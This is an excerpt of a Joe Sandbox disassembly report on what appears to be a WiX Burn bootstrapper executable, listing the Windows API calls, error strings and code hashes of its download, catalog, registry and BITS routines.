                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000410,?,?,00929063,000002C0,00000100), ref: 009484F5
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,00929063,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 00948510
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareHeapString$AllocateProcess
                                                                                                                                                                    • String ID: application$apuputil.cpp$http://appsyndication.org/2006/appsyn$type
                                                                                                                                                                    • API String ID: 2664528157-4206478990
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00946513
                                                                                                                                                                    • DeleteFileW.KERNEL32(00000410,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 0094660A
                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 00946619
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseDeleteErrorFileHandleLast
                                                                                                                                                                    • String ID: Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
                                                                                                                                                                    • API String ID: 3522763407-1704223933
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 00909EED
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 00909F12
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to format component id string., xrefs: 00909EF8
                                                                                                                                                                    • MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 0090A006
                                                                                                                                                                    • Failed to set variable., xrefs: 00909FF6
                                                                                                                                                                    • Failed to format product code string., xrefs: 00909F1D
                                                                                                                                                                    • Failed to get component path: %d, xrefs: 00909F76
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open@16
                                                                                                                                                                    • String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
                                                                                                                                                                    • API String ID: 3613110473-1671347822
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0090F942
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0090F94F
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to open registration key., xrefs: 0090F8AB
                                                                                                                                                                    • Resume, xrefs: 0090F8B6
                                                                                                                                                                    • %ls.RebootRequired, xrefs: 0090F82F
                                                                                                                                                                    • Failed to format pending restart registry key to read., xrefs: 0090F846
                                                                                                                                                                    • Failed to read Resume value., xrefs: 0090F8D8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close
                                                                                                                                                                    • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                                                                                                                    • API String ID: 3535843008-3890505273
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
                                                                                                                                                                    • API String ID: 0-660234312
                                                                                                                                                                    APIs
                                                                                                                                                                    • CoCreateInstance.OLE32(00960C4C,00000000,00000017,00960C5C,?,?,00000000,00000000,?,?,?,?,?,0092DEE7,00000000,00000000), ref: 0092D8E8
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to set notification flags for BITS job., xrefs: 0092D93A
                                                                                                                                                                    • Failed to set progress timeout., xrefs: 0092D952
                                                                                                                                                                    • Failed to create IBackgroundCopyManager., xrefs: 0092D8F4
                                                                                                                                                                    • Failed to create BITS job., xrefs: 0092D922
                                                                                                                                                                    • Failed to set BITS job to foreground., xrefs: 0092D969
                                                                                                                                                                    • WixBurn, xrefs: 0092D913
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                                    • String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
                                                                                                                                                                    • API String ID: 542301482-468763447
                                                                                                                                                                    • Opcode ID: a0f8b6371f78519a4190e8ced4d1e17008687c08dd9b5515fa04a101fc96ec39
                                                                                                                                                                    • Instruction ID: a52b8e307fa4615a557fc9e6b503254693207bb89e3518c731b5e7bb0c1d3012
                                                                                                                                                                    • Opcode Fuzzy Hash: a0f8b6371f78519a4190e8ced4d1e17008687c08dd9b5515fa04a101fc96ec39
                                                                                                                                                                    • Instruction Fuzzy Hash: F631A375F42329AFDB14DFA9D885E7FBBB4AF88710B000559FA01EB350CA749C458B90
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 00945DF8
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00945E05
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 00945E4C
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00945E80
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,dlutil.cpp,000000C8,00000000), ref: 00945EB4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                                                                    • String ID: %ls.R$dlutil.cpp
                                                                                                                                                                    • API String ID: 3160720760-657863730
                                                                                                                                                                    • Opcode ID: cae818d8693634c22c00368bb11f0d0ecf7ced6f4d4a1c05194bbc655d9428f2
                                                                                                                                                                    • Instruction ID: f3268802e00050ff22c97f069c5e3db7565fc97c53ed0f5cf23ae2cb4c05e644
                                                                                                                                                                    • Opcode Fuzzy Hash: cae818d8693634c22c00368bb11f0d0ecf7ced6f4d4a1c05194bbc655d9428f2
                                                                                                                                                                    • Instruction Fuzzy Hash: F531E272941624BBDB208BA8CC45F6F7BA8AB45721F128255FE01EB2C1E7709E0097A1
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090CD5E: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,0090E444,000000FF,00000000,00000000,0090E444,?,?,0090DBEB,?,?,?,?), ref: 0090CD89
                                                                                                                                                                    • CreateFileW.KERNEL32(E90094BA,80000000,00000005,00000000,00000003,08000000,00000000,009053C5,?,00000000,840F01E8,14680A79,00000001,009053BD,00000000,00905489), ref: 0090C956
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00917809,0090566D,00905479,00905479,00000000,?,00905489,FFF9E89D,00905489,009054BD,00905445,?,00905445), ref: 0090C99B
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to open catalog in working path: %ls, xrefs: 0090C9C9
                                                                                                                                                                    • catalog.cpp, xrefs: 0090C9BC
                                                                                                                                                                    • Failed to find payload for catalog file., xrefs: 0090C9E0
                                                                                                                                                                    • Failed to get catalog local file path, xrefs: 0090C9D9
                                                                                                                                                                    • Failed to verify catalog signature: %ls, xrefs: 0090C994
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareCreateErrorFileLastString
                                                                                                                                                                    • String ID: Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
                                                                                                                                                                    • API String ID: 1774366664-48089280
                                                                                                                                                                    • Opcode ID: a8fef640fefd310fa37576508eb053de29c71b2345831b94cead66907f412529
                                                                                                                                                                    • Instruction ID: aa9d9b916aa6aa4b50c78be1dbc0ccec91c05c893a00d1d3ea375f7c4314a50c
                                                                                                                                                                    • Opcode Fuzzy Hash: a8fef640fefd310fa37576508eb053de29c71b2345831b94cead66907f412529
                                                                                                                                                                    • Instruction Fuzzy Hash: B331B5B2940626BFC7219B68CC46F59BBA4EF04720F218665F924EB2C0E671AD509BD0
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,74DF30B0,00000000,?,?,?,?,0092D642,?), ref: 0092D357
                                                                                                                                                                    • ReleaseMutex.KERNEL32(?,?,?,?,0092D642,?), ref: 0092D375
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0092D3B6
                                                                                                                                                                    • ReleaseMutex.KERNEL32(?), ref: 0092D3CD
                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 0092D3D6
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to send files in use message from netfx chainer., xrefs: 0092D41C
                                                                                                                                                                    • Failed to get message from netfx chainer., xrefs: 0092D3F7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MutexObjectReleaseSingleWait$Event
                                                                                                                                                                    • String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
                                                                                                                                                                    • API String ID: 2608678126-3424578679
                                                                                                                                                                    • Opcode ID: 0e9f28db40ac4e904aa57b6a2746ee14d16705f741c9b589d78bb53c9a4cfbfc
                                                                                                                                                                    • Instruction ID: 81fd3718fb0c929d307cfe260949a9c60f168e5a29bb8e7d15b5a3374b95de4d
                                                                                                                                                                    • Opcode Fuzzy Hash: 0e9f28db40ac4e904aa57b6a2746ee14d16705f741c9b589d78bb53c9a4cfbfc
                                                                                                                                                                    • Instruction Fuzzy Hash: 0A31FB35904619BFCB119FA4DC08EAFBBF8EF85320F108255F565E22A0C770D910DB90
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 009409AB
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 009409B5
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 009409FE
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 00940A0B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$CreateErrorLastProcess
                                                                                                                                                                    • String ID: "%ls" %ls$D$procutil.cpp
                                                                                                                                                                    • API String ID: 161867955-2732225242
                                                                                                                                                                    • Opcode ID: 8638375f4f8bba628e39f74092bd017a6d72baafe38c612878bdc3adae28e9c3
                                                                                                                                                                    • Instruction ID: 680956eac193d98a1ff1fcab9ddfa6ccb3af605034fe937f882fe6c26af93eb7
                                                                                                                                                                    • Opcode Fuzzy Hash: 8638375f4f8bba628e39f74092bd017a6d72baafe38c612878bdc3adae28e9c3
                                                                                                                                                                    • Instruction Fuzzy Hash: E8213972D0121EABDB11DFE9CD45EAEBBB8EF44754F10042AEA05B7251E3709E009AA1
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 00909BB3
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,0090A8AB,00000100,000002C0,000002C0,00000100), ref: 00909BD3
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090A8AB,00000100,000002C0,000002C0,00000100), ref: 00909BDE
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to format variable string., xrefs: 00909BBE
                                                                                                                                                                    • Failed to set directory search path variable., xrefs: 00909C0F
                                                                                                                                                                    • Failed while searching directory search: %ls, for path: %ls, xrefs: 00909C34
                                                                                                                                                                    • Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 00909C4A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                    • String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                                                                    • API String ID: 1811509786-2966038646
                                                                                                                                                                    • Opcode ID: 624cda8867b64b4f2edf2ad043a0a0158acd5375fd9e3d666a80edd70737f306
                                                                                                                                                                    • Instruction ID: 295acae2c6c8e617e306cddd321e09fba71072ab66a2f87ce3691e8d9fe9aa4a
                                                                                                                                                                    • Opcode Fuzzy Hash: 624cda8867b64b4f2edf2ad043a0a0158acd5375fd9e3d666a80edd70737f306
                                                                                                                                                                    • Instruction Fuzzy Hash: C021D433D40035BEDB2266988D02F5DBBACAF41370F210251FE54661E2D7759E50A7C9
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 00909D64
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,?,0090A883,00000100,000002C0,000002C0,?,000002C0,00000100), ref: 00909D84
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090A883,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00909D8F
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to format variable string., xrefs: 00909D6F
                                                                                                                                                                    • Failed while searching file search: %ls, for path: %ls, xrefs: 00909DBD
                                                                                                                                                                    • File search: %ls, did not find path: %ls, xrefs: 00909DF3
                                                                                                                                                                    • Failed to set variable to file search path., xrefs: 00909DE7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                    • String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
                                                                                                                                                                    • API String ID: 1811509786-3425311760
                                                                                                                                                                    • Opcode ID: bd0652094b6b9f01b0bba0628bfcf7b2bbb16d9548dd760d436a2a1d451f301b
                                                                                                                                                                    • Instruction ID: 8ad99cc1060c7bfd21c1d30bdba1473ebcff36b1feab147341b36e55d3c219fa
                                                                                                                                                                    • Opcode Fuzzy Hash: bd0652094b6b9f01b0bba0628bfcf7b2bbb16d9548dd760d436a2a1d451f301b
                                                                                                                                                                    • Instruction Fuzzy Hash: 4F11D533984125FFDF226698CD02F9DBB29AF50734F210211FD10B61E2E7725E50A6D1
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,0091D365,00000000,?,?,0091C7C9,00000001,?,?,?,?,?), ref: 0091CF37
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0091D365,00000000,?,?,0091C7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0091CF41
                                                                                                                                                                    • GetExitCodeThread.KERNEL32(00000001,?,?,?,0091D365,00000000,?,?,0091C7C9,00000001,?,?,?,?,?,00000000), ref: 0091CF7D
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0091D365,00000000,?,?,0091C7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0091CF87
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                                                                    • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
                                                                                                                                                                    • API String ID: 3686190907-1954264426
                                                                                                                                                                    • Opcode ID: 8a7a1fa1d05502bad695fe826be824509645dec25069c579b3e592353bb83616
                                                                                                                                                                    • Instruction ID: a3934273619251b2fec1399390d71644f31e794f2949f0289502726a15a1aa09
                                                                                                                                                                    • Opcode Fuzzy Hash: 8a7a1fa1d05502bad695fe826be824509645dec25069c579b3e592353bb83616
                                                                                                                                                                    • Instruction Fuzzy Hash: 180149B7FC56396787309B965C0AE9FBA4C9F01B72B014165BE04BB280E7A0CD4092E4
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,00916EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 009169BB
                                                                                                                                                                    • GetLastError.KERNEL32(?,00916EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 009169C5
                                                                                                                                                                    • GetExitCodeThread.KERNEL32(00000001,00000000,?,00916EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 00916A04
                                                                                                                                                                    • GetLastError.KERNEL32(?,00916EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 00916A0E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                                                                    • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
                                                                                                                                                                    • API String ID: 3686190907-2546940223
                                                                                                                                                                    • Opcode ID: 35e1a8d29370030de4cbf0270289f3283ef7107be53d5abf3cc8014f9841e1bb
                                                                                                                                                                    • Instruction ID: d96c250ae20639a75ecd1d76dbb269eb3c66093225cbb75c57361d0ff5fb4bca
                                                                                                                                                                    • Opcode Fuzzy Hash: 35e1a8d29370030de4cbf0270289f3283ef7107be53d5abf3cc8014f9841e1bb
                                                                                                                                                                    • Instruction Fuzzy Hash: 1411A970B4420ABBDB00DF669E05FAE36ACEF40315F104169BD14E9190DB75CE40A754
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0091F7EE
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0091F8FB
                                                                                                                                                                    Strings
                                                                                                                                                                    • UX denied while trying to set source on embedded payload: %ls, xrefs: 0091F870
                                                                                                                                                                    • UX requested unknown payload with id: %ls, xrefs: 0091F85A
                                                                                                                                                                    • Failed to set source path for payload., xrefs: 0091F88A
                                                                                                                                                                    • Failed to set source path for container., xrefs: 0091F8E0
                                                                                                                                                                    • UX requested unknown container with id: %ls, xrefs: 0091F8BA
                                                                                                                                                                    • Engine is active, cannot change engine state., xrefs: 0091F808
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
